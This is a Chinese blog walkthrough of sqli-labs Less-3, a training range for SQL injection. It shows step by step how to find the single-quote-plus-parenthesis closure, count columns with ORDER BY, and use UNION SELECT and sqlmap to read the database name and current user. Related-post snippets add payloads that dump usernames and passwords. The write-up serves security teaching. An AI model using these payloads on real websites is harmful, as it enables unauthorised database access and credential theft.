Sqli-labs靶场第3关详解[Sqli-labs-less-3]

已于 2024-02-19 14:30:42 修改
阅读量510 收藏 7
点赞数 8
分类专栏: sqli-labs 文章标签: 数据库 mysql sql 网络安全 web安全
于 2024-02-19 14:29:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136169466
版权

Sqli-labs-Less-3

前言:
SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)

    利用 order by 来测列数

    测显位:mysql用1,2,3,4

 Mysql获取相关数据:

    一、数据库版本-看是否认符合information_schema查询-version()
    二、数据库用户-看是否符合root型注入攻击-user()
    三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
    四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

 #手工注入

1.根据提示id传参,id=1',利用单引号' 测试判断注入参数闭合方式,根据报错提示发现这题是id值的闭合方式为单引号'+小括号)

http://192.168.0.7:802/sqli-labs/Less-3/?id=1'

2.利用oder by 判断列数 / 联合查询 sql注入--+主要目的是注释闭合后续的单引号和小括号。

得到  字段数 为3

http://192.168.0.7:802/sqli-labs/Less-3/?id=1')  order by 4 --+

3.利用回显位,爆库名、当前用户。     得到数据库名为security,当前用户为:root@localhost

http://192.168.0.7:802/sqli-labs/Less-3/?id=18') union select 1,database(),user()--+

 成功利用sql漏洞!!!

 #自动化注入-SQLmap工具注入

python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-3/?id=1 --current-db --current-user

 爆库名、当前用户。     得到数据库名为security,当前用户为:root@localhost

 成功利用sql漏洞!!!

「已注销」
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WEB常见漏洞之SQL注入(靶场篇—1)
One-Fox安全团队的博客
05-05 3800
sqli靶场版SqliLabs 是一个学习 SQL 注入的靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL实践之sqli-labs靶场(持续更新)
m0_62102520的博客
07-08 555
总结1、寻找注入点2、判断闭合方式3、验证漏洞4、判断列数及回显位5、取数据取数据库名根据数据库名,取表名根据数据库名、表名,取列名取具体数据。
sqli-labs 靶场(1-10)
知世郎
10-15 2003
第七当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之前的卡不一样,之前都有报错信息。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s。id=2'的时候看到页面报错信息。
sqli-labs笔记第三
最新发布
m0_66169375的博客
04-23 489
id=1') order by 4 --+ 回显错误,说明最大有3个字段可显示数据。1,判断注入类型:根据提示看出这的注入类型是**单引号和单括号**型注入。id=1') and 1=2 回显出错误。3,使用union select 1,2,3 联合查询有几个显示位。id=1') order by 3 --+ 回显正常。id=1') and 1=1 --+回显正常。此处是-1而不是1,因为1是正常数字会占用显示位置。,回显可知,能看到的数据显示位只有2,3。5,爆破出数据库内的数据库名。
SQL注入:sqli-labs靶场(1-37
qq_68163788的博客
02-03 5578
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqli-labs靶场(1-6
喜欢创作各种技术类文章,希望可以帮到你
01-27 1134
id=1') and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号。id=1 and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号。id=1') and 1=2 union select 1,database(),version() --+ 查出库名,及版本号。
SQL注入原理
weixin_50340347的博客
06-15 1291
SQL注入靶场平台使用的是sqli。它是一个针对SQL注入的专项联系平台。搭建和安装比较简单,可以自习查询相教程。
SQL注入--靶场练习
wmr123456001的博客
02-11 2000
SQL注入靶场练习
SQL注入靶场
热门推荐
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
sql注入之靶场实操
weixin_45711977的博客
06-23 3434
sql注入之靶场实操
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
02-12
sqli-labs靶场
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
靶场实践之SQL注入篇
Stephen8848的博客
08-14 383
渗透测试的时候使用工具是很简单的,但是要是对技术有追求,还是需要了解得更深入一些,多探索!安装系统自行百度,这里不做过多说明。版本5之后,数据库里有一个默认的库。它里面有三个键的表,分别是。
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5830
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
五分钟制作sql注入靶场
ChenD的学习笔记
10-15 2035
接触安全也快两个月了,学了很多安全的知识,也接触到了渗透测试,前面学习了sql注入和XSS漏洞,听郭老师说可以尝试自己搭建一个靶场,所以开始制作自己靶场
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 2831
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值